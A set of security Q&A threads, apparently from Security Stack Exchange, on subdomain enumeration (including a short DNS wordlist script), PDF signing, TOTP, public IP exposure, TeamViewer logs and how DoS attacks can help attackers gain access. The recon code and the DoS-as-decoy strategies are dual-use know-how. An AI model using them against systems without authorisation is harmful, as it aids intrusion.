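If you want to check whether your own CPU advertises the AES-NI instructions that the EVP path can take advantage of, a quick Linux-only sketch is to look for the aes flag in /proc/cpuinfo (other operating systems expose the same CPUID information differently):

    # Quick Linux-only check: does the CPU advertise the AES-NI instruction set?
    # Looks for the "aes" flag in /proc/cpuinfo.
    with open("/proc/cpuinfo") as f:
        for line in f:
            if line.startswith("flags"):
                flags = line.split(":", 1)[1].split()
                print("AES-NI available" if "aes" in flags else "No AES-NI flag found")
                break

If the flag is present, the large gap between the two benchmark runs above is expected: only the EVP run is using the hardware instructions.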
{ "source": [ "https://security.stackexchange.com/questions/35036", "https://security.stackexchange.com", "https://security.stackexchange.com/users/19872/" ] }
35,078
One of the things I need to do from time to time is to find the subdomains of a site. For example, starting with example.com:

- sub1.example.com
- other.example.com
- another.example.com

I'm looking for any additional ways to perform recon on these targets, and I want to get a list of all the subdomains of a domain. I'm currently doing a number of things, including:

- using Maltego to crawl for info
- using search engines to search for subdomains
- crawling site links
- examining DNS records
- examining incorrectly configured SSL certificates
- guessing things like 'vpn.example.com'
As a pentester, being able to find the subdomains of a site comes up often. So I wrote a tool, SubBrute, that does this quite well, if I do say so myself. In short, it is better than other tools (such as fierce2) in that it's a lot faster, more accurate and easier to work with. The tool comes with a list of real subdomains obtained from spidering the web. This subdomain list is more than 16 times the size of fierce2's, and SubBrute will take about 15 minutes to exhaust it on a home connection. The output is a clean, newline-separated list that is easy to use as input for other tools like nmap or a web application vulnerability scanner.
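If you want a feel for what such a tool does under the hood, the core idea is simply resolving candidate names from a wordlist. A minimal, hypothetical sketch (the wordlist and target domain are placeholders, and you should only test domains you are authorised to assess):

    # Minimal sketch of wordlist-based subdomain discovery via DNS resolution.
    # Real tools use far larger lists and asynchronous resolvers for speed.
    import socket

    domain = "example.com"                                  # placeholder target
    wordlist = ["www", "mail", "vpn", "dev", "test", "intranet"]

    for name in wordlist:
        candidate = f"{name}.{domain}"
        try:
            addr = socket.gethostbyname(candidate)
            print(f"{candidate} -> {addr}")
        except socket.gaierror:
            pass                                            # name does not resolve

One practical caveat: a wildcard DNS record will make every candidate resolve, so real tools first detect and filter out wildcard responses.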
{ "source": [ "https://security.stackexchange.com/questions/35078", "https://security.stackexchange.com", "https://security.stackexchange.com/users/18541/" ] }
35,121
I've created a few certificates to use myself, but I find myself stumped when it comes to creating a certificate which contains a digital signature. First, how would I go about creating a standard certificate which no longer contains only common fields, but ones containing a digital signature as well. And second, how could I manually append this certificate as data to the corresponding pdf file? Thanks!
According to your comments to other answers, you actually want to sign a pdf file with [your] certificate, then have this signature saved and appended to the pdf [you]'ve just signed. (BTW, you sign with the private key associated with the public key in your certificate, not with the certificate itself, but that's a detail.) I assume you want to "append" the signature to the PDF in a way that a standard conform PDF viewer (e.g. Adobe Reader) will recognize, display, and validate as an integrated PDF signature. In that case you already started wrong by signing the original PDF as is and expecting to now have to merely somehow append that signature to the file. Instead you have to build a new revision of the PDF document which includes a PDF AcroForm signature field whose value is a signature dictionary whose /Contents entry contains the signature of the whole new revision with the exception of the /Contents entry contents. If multiple signatures are to be integrated into a PDF, this is done by means of incremental PDF updates (explicitly not by adding multiple SignerInfo structures to a single integrated CMS signature container!): This is explained quite graphically and in more detail in the Adobe document Digital Signatures in a PDF . It furthermore is specified in the PDF specification ISO 32000-1:2008 made available here by Adobe in section 12.8 Digital Signatures. Be aware, though! The specification says: A byte range digest shall be computed over a range of bytes in the file, that shall be indicated by the ByteRange entry in the signature dictionary. This range should be the entire file, including the signature dictionary but excluding the signature value itself (the Contents entry). Other ranges may be used but since they do not check for all changes to the document, their use is not recommended. This seems to allow that you first create a signature for the original PDF and then append a new revision holding that signature indicating that range of signed bytes only contains that original revision, not the extended revision without only the signature. In reality, though, PDF viewers (especially Adobe Reader) will only accept signatures which follow the recommendation that the signed range should be the entire file, including the signature dictionary but excluding the signature value itself. Newer specifications, e.g. the ETSI PAdES specification ETSI TS 102 778 (cf. section 5.1 item b in part 2 and section 4.2 item c in part 3 ) even make this recommendation officially a requirements, and so will ISO 32000-2. Depending on your programming context, there are many PDF libraries supporting the creation of integrated PDF signatures and also many products using these libraries. Some of them are even available for free subject e.g. to the AGPL.
{ "source": [ "https://security.stackexchange.com/questions/35121", "https://security.stackexchange.com", "https://security.stackexchange.com/users/25434/" ] }
35,157
Google Authenticator is an alternative to SMS for 2-Step Verification: instead of receiving codes by text message, you install an app on Android that provides them. It works without any connectivity; it even works in airplane mode. This is what I don't get: how is it possible that it works without connectivity? How do the mobile phone and the server stay in sync so they know which code is valid at that very moment?
Google Authenticator supports both the HOTP and TOTP algorithms for generating one-time passwords. With HOTP, the server and client share a secret value and a counter, which are used to compute a one time password independently on both sides. Whenever a password is generated and used, the counter is incremented on both sides, allowing the server and client to remain in sync. TOTP essentially uses the same algorithm as HOTP with one major difference. The counter used in TOTP is replaced by the current time. The client and server remain in sync as long as the system times remain the same. This can be done by using the Network Time protocol . The secret key (as well as the counter in the case of HOTP) has to be communicated to both the server and the client at some point in time. In the case of Google Authenticator, this is done in the form of a QRCode encoded URI. See: KeyUriFormat for more information.
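To make the TOTP case concrete, here is a minimal sketch of the RFC 6238/4226 computation using only Python's standard library. Both the phone and the server run this same calculation on their own copy of the shared secret and their own clock, which is why no connectivity is needed (this is a simplified illustration, not Google Authenticator's actual source code):

    # Minimal TOTP sketch (RFC 6238 on top of RFC 4226), standard library only.
    # Both sides share `secret` and derive the same 6-digit code from the current time.
    import hashlib, hmac, struct, time

    def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
        msg = struct.pack(">Q", counter)                    # 8-byte big-endian counter
        digest = hmac.new(secret, msg, hashlib.sha1).digest()
        offset = digest[-1] & 0x0F                          # dynamic truncation (RFC 4226)
        code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
        return str(code % (10 ** digits)).zfill(digits)

    def totp(secret: bytes, time_step: int = 30) -> str:
        counter = int(time.time()) // time_step             # the "counter" is just the time slot
        return hotp(secret, counter)

    shared_secret = b"12345678901234567890"                 # provisioned once, e.g. via the QR code
    print(totp(shared_secret))                              # same value on the phone and the server

As long as both clocks agree to within the 30-second time step (servers usually accept a small window of adjacent slots), the codes match without either side talking to the other.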
{ "source": [ "https://security.stackexchange.com/questions/35157", "https://security.stackexchange.com", "https://security.stackexchange.com/users/15194/" ] }
35,160
I work for a large-ish company (thousands of employees across multiple locations). I recently needed to know what the possible public IP addresses are, so that a vendor could identify us (presumably for their firewall). The network guy I spoke with acted as if anyone knowing our range of public IP addresses is a significant security threat. A few of the IP addresses in that range are totally public, being resolved from our public web site domains. What is the real risk of having the whole world know all the possible IP addresses that you might have?
Your public-facing IP address is, for most intents and purposes, public information. No security should depend on it being private. It's not something you necessarily want to wave around willy-nilly (just as you wouldn't wave your home address around), but it also isn't hard for someone who knows what they are doing to find with minimal effort. If someone has a legitimate need for your IP address, there is no reason it should be a security red flag. Your public IP address is, by necessity, disclosed to every system you talk to on the Internet.
{ "source": [ "https://security.stackexchange.com/questions/35160", "https://security.stackexchange.com", "https://security.stackexchange.com/users/25461/" ] }
35,228
I came to my computer today, having not been here since Monday afternoon. I am using Windows 7. There were some error messages showing even on the login screen, about memory violations caused by Spotify and one other program (I can't remember which), and I just clicked them away, even though this is not normal on my PC. Sometimes it freezes on the login screen and I have to reboot, but this was different. I did not take note of the messages as I just didn't care. After logging in, I noticed that my TeamViewer client was running (the GUI was showing). I thought this was odd, since I haven't been using it lately. I was a bit curious, so I checked the log. I will not include it here, as I don't know how to read it and I don't know what could identify me. It seems that an update led to this, but I am not sure. Probably, but I don't like the fact that the GUI was showing, with my ID and password visible. They could have updated it silently or given me a message... So, this leads me to the question: how do I figure out whether someone has been using TeamViewer 8 to access my computer while I was not here? What should I look for in the TeamViewer logs and perhaps the Windows 7 event logs? And a bonus question: is it safe to have TeamViewer 8 running in the background at all?
Running TeamViewer isn't very secure (read here).

To determine who was logged in, look here:

    C:\Program Files\TeamViewer\VersionX\Connections_incoming.txt
    C:\Users\XXX\AppData\Roaming\TeamViewer\Connections.txt
{ "source": [ "https://security.stackexchange.com/questions/35228", "https://security.stackexchange.com", "https://security.stackexchange.com/users/24081/" ] }
35,264
I'm doing some revision for an exam, and I've made a note to look at how DoS attacks can be used to gain access to a system. I can't find anything online, but I found a reference to the fact here. I hope one of you can enlighten me.
DoS attacks can be used in several ways as part of gaining access:

- Overwhelming primary defenses. When you are conducting a DoS attack, the primary defense mechanisms get caught up in it too. They can be overwhelmed and, as a result, they may: a) not respond appropriately, b) hang altogether, or c) the people watching them are distracted, or your efforts are lost in the DoS logs. In addition, if the primary systems are rolled over to secondary systems (which often happens), those may not have up-to-date configurations, or you could catch the roll-over in a time gap where the synchronization of everything is not current.

- Overwhelming primary systems may expose flaws. A DoS attack may be used to expose flaws that could be exploited. These could be procedural flaws or system flaws. It could be that as a result of a DoS attack you force the organization to upgrade, and during the upgrade you take that window of opportunity to exploit.

- The DoS attack is a decoy. A classic attack... what magicians do all the time: watch the left hand while I steal with my right. The DoS takes up so much of the organization's focus that secondary routes into the system (physical, social, or technical) could be undermanned or under-provisioned, or systems can be more easily bypassed without being noticed.

- The DoS attack could be a plant. I once heard of a hacker who conducted a limited DoS attack on organization A because he had done his research: the CIO of organization A was very close to organization B, and both organizations were in the same general business arena. So he suspected that if he could get organization A to adopt a specific technology to thwart his rather crude DoS attack, organization B would do the same - thinking they might be next. He was quite correct, as organization B did. Why? Well, the hacker had a 0-day exploit in that piece of technology, and he wanted to attack organization B.

- Secondary route/bridging exploitation. An extended DoS attack that can be sustained can force business units within the organization to move to secondary system paths (networks) to keep critical business going. While some of these secondary paths may be well planned and secured, many are not. For instance, a business unit may stand up a WiFi or MiFi device and start using it as their business network without any security infrastructure. If an attacker is actively monitoring and profiling, they may be able to capture and attack these very vulnerable paths, and now you have a direct, totally unsecured bridged network into the organization's intranet.
{ "source": [ "https://security.stackexchange.com/questions/35264", "https://security.stackexchange.com", "https://security.stackexchange.com/users/-1/" ] }